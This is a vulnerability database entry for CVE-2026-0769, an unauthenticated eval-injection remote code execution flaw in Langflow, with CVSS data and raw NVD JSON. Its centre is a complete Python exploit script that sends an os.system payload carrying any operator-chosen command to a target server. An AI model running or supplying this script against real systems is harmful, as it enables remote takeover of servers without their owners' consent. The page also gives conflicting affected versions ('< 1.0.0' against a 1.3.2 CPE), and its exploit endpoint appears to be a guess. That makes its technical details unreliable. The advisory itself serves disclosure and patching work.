Security Vulnerability Report
CVE-2026-0769 CVSS 9.8 CRITICAL

CVE-2026-0769

Published: 2026-01-23 04:16:04
Last Modified: 2026-02-18 16:43:31

Description

Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:1.3.2:*:*:*:*:*:*:* - VULNERABLE
Langflow < 1.0.0 (all versions prior to patch)
Langflow eval_custom_component_code function (unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-0769 PoC - Langflow RCE via eval_custom_component_code
# This PoC demonstrates the remote code execution vulnerability in Langflow

import sys

import requests


def exploit(target_url, command="whoami"):
    """
    Exploit CVE-2026-0769 by injecting malicious code through eval_custom_component_code

    Args:
        target_url: Base URL of the vulnerable Langflow instance
        command: System command to execute on the target
    """
    # The vulnerability exists in the eval_custom_component_code function
    # Malicious payload using Python's __import__ to execute system commands
    payload = f"__import__('os').system('{command}')"

    # Alternative payload using the subprocess module
    # payload = f"__import__('subprocess').check_output('{command}', shell=True)"

    try:
        # Send the malicious payload to the vulnerable endpoint
        # The exact endpoint may vary based on Langflow version
        endpoint = f"{target_url.rstrip('/')}/api/v1/custom_component/eval"
        headers = {
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
        }
        data = {
            'code': payload,
            'function': 'eval_custom_component_code'
        }

        print(f"[*] Targeting: {endpoint}")
        print(f"[*] Payload: {payload}")

        response = requests.post(endpoint, json=data, headers=headers, timeout=10)

        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")

        if response.status_code == 200:
            print("[+] Exploit successful! Command executed.")
        else:
            print("[-] Exploit failed. Check the target and payload.")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} http://target.com:7860 whoami")
        sys.exit(1)

    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami"
    exploit(target, cmd)

References

https://www.zerodayinitiative.com/advisories/ZDI-26-035/ (Third Party Advisory, ZDI)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0769",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T04:16:03.933",
    "lastModified": "2026-02-18T16:43:31.297",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad de ejecución remota de código por inyección de eval en Langflow eval_custom_component_code. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Langflow. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica reside en la implementación de la función eval_custom_component_code. El problema se debe a la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar código Python. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-26972."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-95"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:langflow:langflow:1.3.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "2BBE2B7A-5520-4886-8087-E6A96ABC0BD2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-035/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}